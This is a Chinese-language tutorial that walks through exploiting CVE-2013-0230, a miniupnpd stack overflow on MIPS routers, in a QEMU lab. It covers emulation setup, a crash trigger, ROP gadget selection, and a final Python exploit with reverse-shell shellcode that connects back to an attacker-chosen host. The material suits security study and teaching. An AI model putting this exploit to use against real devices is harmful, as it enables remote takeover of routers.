路由器漏洞 EXP 开发实践

测试环境

Debian 9

Qemu

本文主要以 CVE-2013-0230 以漏洞为例，解释路由器缓冲区的漏洞 exp 编写。

0x01 环境搭建

使用 firmware-analysis-toolkit

firmware-analysis-toolkit

https://github.com/attify/firmware-analysis-toolkit

是模拟固件和分析安全漏洞的工具。

该工具可自动解压固件并创建 image 使用 qemu 模拟路由器。

本文还尝试使用该工具，但存在一些问题，无法正常启动。这种情况可以使用Debian MIPS虚拟机可以直接调试或使用qemu-mipsel-static来测试某个mips程序

工具链

使用 buildroot 来构建

从 buildroot 官网下载最新版本，解压配置相关设置，下载地址：

https://buildroot.org/download.html

执行命令：

make menuconfig

选择 mips (big endian) 构架

kernel 这里的选择是3.10.x

cross gdb 选择，或者也可以使用gdb-multiarch(apt-get 直接安装，在使用时要set arch mips，本文使用gdb-multiarch)

make 直接编译

make -j2 (-j 后面 cpu 核心)

在根目录的 output 文件夹是编译好的程序

网桥搭建

bunctl -t tap0 -u <user>

ifconfig tap0 up

brctl addbr br0 

brctl addif br0 tap0

brctl addif br0 eth0

ifconfig br0 192.168.86.2

在启动Debian MIPS虚拟机后，需要配置虚拟机 IP 与主机通信

Debian MIPS 虚拟机

从连接下载 qemu 镜像：

https://people.debian.org/~aurel32/qemu/mips/

网桥搭建

bunctl -t tap0 -u <user>

ifconfig tap0 up

brctl addbr br0 

brctl addif br0 tap0

brctl addif br0 eth0

ifconfig br0 192.168.86.2

在启动 Debian MIPS 虚拟机后，需要配置虚拟机IP 与主机通信

启动命令

#!/usr/bin/env sh

qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net tap,ifname=tap0,script=no

UART 调试

如果手边有路由器，也可以用 UART 调试路由器， 需要使用的是 ttl 转 usb 模块, 拆卸路由器后，电路板上通常有四个插孔，用于开发期间的调试，而相应的调试电路在发行期间没有被拆除，因此它们是外部的 ttl 转 usb 模块或六合一模块 UART 调试。需要使用的接口主要包括 TX、RD、GND，连接完成后

在 Linux 可在系统上执行：

sudo minicom --device /dev/ttyUSB0

然后，路由器的启动信息将出现在重新接入电源时，详情请参考

http://future-sec.com/iot-security-hardware-debuging.html

0x02 CVE-2013-0230

预备知识

本文用于调试 gdb 调试，使用插件pwndbg:

https://github.com/pwndbg/pwndbg

当然也可以用gef

https://github.com/hugsy/gef

2、mips 有些汇编需要了解汇编基础

3.本文调试 CVE 为了栈溢漏洞，还需要了解其原理

4、ida 使用基础

CVE-2013-0230

设置目标

下载到目标固件后，使用binwalk解压，记得先

sudo apt install squashfs-tools

解压完后

漏洞出现了miniupnpd文件上

使用qemu-system-mips启动虚拟机，配置 ip

配置后，通过 scp 将 miniupnpd 文件传输到虚拟机，

还需要将libc.so.0和ld-uClibc.so.0复制到虚拟机中，放在一起 lib 目录用，设置链接，确保miniupnpd可以运行

启动miniupnpd一些参数需要设置

这里写了一个方便调试的脚本 run, 并且开启 gdbserver , 启动远程调试服务

IDA 逆向分析

使用 ida 打开miniupnpd文件， 来到ExecuteSoapAction处

可以清楚的看到 memcpy 函数调用, 调用 memcpy 过程中将 a1 不受限制地复制数据 a0 因此，经典的栈溢出发生了

远程调试

在虚拟机中运行 run 脚本, 在主机上~/.gdbinit中加入

set architecture mips

target rmote 192.168.86.103:1234

当使用 gdb-multiarch 时，自动执行 .gdbinit 脚本内容

gdb 连上后运行触发脚本

import urllib2

payload = 'A'*2500 

#payload = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D'

#payload = 'A' * 2076 

#payload += 'BBBB'

soap_headers = {
   
     

        'SOAPAction':"n:schemas-upnp-org:service:WANIPConection:1#"+payload,

        }

soap_data = """

  <?xml version='1.0' encoding="UTF-8"?>

  <SOAP-ENV:Envelope

  SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"

  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"

  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap.envelope/"

  >

  <SOAP-ENV:Body>

  <ns1:action xmlns:ns1="urn:schemaas-upnp-org:service:WANIPConnection:1" SOAP-ENC:root="1">

  </ns1:action>

  </SOAP-ENV:Body>

  </SOAP-ENV:Envelope>

  """

req = urllib2.Request("http://192.168.86.103:5555", soap_data, soap_headers)

res = urllib2.urlopen(req)

脚本运行后，程序崩溃

返回地址已经被覆盖为 0x41414141, 使用 pattern 工具进一步来确定栈的大小

pattern 2500

将 payload 改为生成的字符串

重新运行

确定栈大小 2076

在 0x404f44 处下断点，断下来后，查看 a0、a1 的情况

可以看到 a1 指向 'AAA...'

a0 到 sp 的大小为 2072, 符合我们所计算的溢出栈的大小

0x03 ROP 链

我们可以控制 ra、s0、s1、s2、s3、s4、s5、s6 寄存器, 由于 mips 构架的 CPU 有两处缓存，cpu 分别从 code 缓存和 data 缓存来获取指令和输入的数据

为此我们需要处理缓存问题，清除缓存。Airties 路由器不使用 ASLR ，libc 的地址不变

我们需要通过调用 sleep 函数来刷新缓存的问题，随后返回到 shellcode 去执行。

这里使用 ida 插件 mipsrop

https://github.com/devttys0/ida

来查找一些 gadget

1、查找 "li $a0, 1"

用 ida 载入 libc.so.0 , edit -> plugins -> MIPS ROP Finder 来初始化 mipsrop 插件

mipsrop.fine("li $a0, 1")

这里选择地址 0x00036860 处的 gadget

2、通过 miprop.tails() 来找到有用的 syscall

找到一处通过 s1 传入地址，跳到该地址调用的 gadget

3、找到存放 shellcode 的地方

4、gadget 将 shellcode 的地址放入 s0 ,为此要找到一处将 s0 放入 t9 的指令

5、找到 libc 地址

在 debian mips 虚拟机上执行

sysctl -w kernel.randomize_va_space = 0

来禁用 ASLR 通过 /proc/PID/maps 来找到 libc 的地址

libc 的基址为 0x77f92000

sleep 地址 0x35620

ra_1 = 1.gadget

s1 = 2.gadget

ra__2 = 3.gadget

s6 = 4.gadget

s2 = s6 = 4.gadget

于是 payload 构造如下

2052 bytes junk + s1 + 16 bytes junk + s6 + ra_1 + 28 bytes junk + sleep + 40 bytes junk + s2 + ra_2 + 32 bytesjunks + shellcode

0x04 最终 EXP

 #!/usr/bin/env python

import urllib2

from string import join

from argparse import ArgumentParser

from struct import pack

from socket import inet_aton

BYTES = 4

def hex2str(value, size=BYTES):

    data = ""

    for i in range(0, size):

        data += chr((value >> (8*i)) & 0xFF)

    data = data[::-1]

    return data

arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \

                            CVE-2013-0230 Reverse Shell exploit for AirTies \

                            RT Series, start netcat on lhost:lport")

#arg_parser.add_argument("--target", required=True, help="Target IP address")

arg_parser.add_argument("--lhost", required=True, help="The IP address\

                        which nc is listening")

arg_parser.add_argument("--lport", required=True, type=int, help="The\

                        port which nc is listening")

args = arg_parser.parse_args()

libc_base = 0x77f92000

ra_1 = hex2str(libc_base + 0x36860)     # ra = 1. gadget

'''

.text:00036860                 li      $a0, 1

.text:00036864                 move    $t9, $s1

.text:00036868                 jalr    $t9 ; sub_36510

.text:0003686C                 ori     $a1, $s0, 2

'''

s1 = hex2str(libc_base + 0x1636C)       # s1 = 2. gadget

'''

.text:0001636C                 move    $t9, $s1

.text:00016370                 lw      $ra, 0x28+var_4($sp)

.text:00016374                 lw      $s2, 0x28+var_8($sp)

.text:00016378                 lw      $s1, 0x28+var_C($sp)

.text:0001637C                 lw      $s0, 0x28+var_10($sp)

.text:00016380                 jr      $t9

.text:00016384                 addiu   $sp, 0x28

'''

sleep = hex2str(libc_base + 0x35620)    # sleep function

ra_2 = hex2str(libc_base + 0x28D3C)     # ra = 3. gadget

'''

.text:00028D3C                 addiu   $s0, $sp, 0xD0+var_B0

.text:00028D40                 lw      $a0, 0($s2)

.text:00028D44                 move    $a1, $s1

.text:00028D48                 move    $a2, $s4

.text:00028D4C                 move    $t9, $s6

.text:00028D50                 jalr    $t9

.text:00028D54                 move    $a3, $s0

'''

s6 = hex2str(libc_base + 0x1B19C)       # ra = 4.gadget

'''

.text:0001B19C                 move    $t9, $s0

.text:0001B1A0                 jalr    $t9

.text:0001B1A4                 nop

'''

s2 = s6

lport = pack('>H', args.lport)

lhost = inet_aton(args.lhost)

shellcode = join([

    "\x24\x11\xff\xff"

    "\x24\x04\x27\x0f"

    "\x24\x02\x10\x46"

    "\x01\x01\x01\x0c"

    "\x1e\x20\xff\xfc"

    "\x24\x11\x10\x2d"

    "\x24\x02\x0f\xa2"

    "\x01\x01\x01\x0c"

    "\x1c\x40\xff\xf8"

    "\x24\x0f\xff\xfa"

    "\x01\xe0\x78\x27"

    "\x21\xe4\xff\xfd"

    "\x21\xe5\xff\xfd"

    "\x28\x06\xff\xff"

    "\x24\x02\x10\x57"

    "\x01\x01\x01\x0c"

    "\xaf\xa2\xff\xff"

    "\x8f\xa4\xff\xff"

    "\x34\x0f\xff\xfd"

    "\x01\xe0\x78\x27"

    "\xaf\xaf\xff\xe0"

    "\x3c\x0e" + lport +

    "\x35\xce" + lport +

    "\xaf\xae\xff\xe4"

    "\x3c\x0e" + lhost[:2] +

    "\x35\xce" + lhost[2:4] +

    "\xaf\xae\xff\xe6"

    "\x27\xa5\xff\xe2"

    "\x24\x0c\xff\xef"

    "\x01\x80\x30\x27"

    "\x24\x02\x10\x4a"

    "\x01\x01\x01\x0c"

    "\x24\x0f\xff\xfd"

    "\x01\xe0\x78\x27"

    "\x8f\xa4\xff\xff"

    "\x01\xe0\x28\x21"

    "\x24\x02\x0f\xdf"

    "\x01\x01\x01\x0c"

    "\x24\x10\xff\xff"

    "\x21\xef\xff\xff"

    "\x15\xf0\xff\xfa"

    "\x28\x06\xff\xff"

    "\x3c\x0f\x2f\x2f"

    "\x35\xef\x62\x69"

    "\xaf\xaf\xff\xec"

    "\x3c\x0e\x6e\x2f"

    "\x35\xce\x73\x68"

    "\xaf\xae\xff\xf0"

    "\xaf\xa0\xff\xf4"

    "\x27\xa4\xff\xec"

    "\xaf\xa4\xff\xf8"

    "\xaf\xa0\xff\xfc"

    "\x27\xa5\xff\xf8"

    "\x24\x02\x0f\xab"

    "\x01\x01\x01\x0c"

    ], '')

payload = 'A'*2052 + s1 + 'A'*(4*4) + s6 + ra_1 + 'A'*28 + sleep + 'A'*40 + s2\

    + ra_2 + 'C'*32 #+ shellcode

soap_headers = {
   
     

    'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,

}

soap_data = """

    <?xml version='1.0' encoding="UTF-8"?>

    <SOAP-ENV:Envelope

    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"

    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"

    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"

    >

    <SOAP-ENV:Body>

    <ns1:action xmlns:ns1="urn:schemas-upnp-org:service:WANIPConnection:1"\

        SOAP-ENC:root="1">

    </ns1:action>

    </SOAP-ENV:Body>

    </SOAP-ENV:Envelope>

    """

#try:

print "Exploiting..."

req = urllib2.Request("http://192.168.86.103:5555", soap_data,soap_headers)

urllib2.urlopen(req)

参考文章

https://p16.praetorian.com/blog/getting-started-with-damn-vulnerable-router-firmware-dvrf-v0.1

https://emreboy.wordpress.com/2012/12/24/connecting-qemu-to-a-real-network/

http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/

http://www.devttys0.com/2013/10/mips-rop-ida-plugin/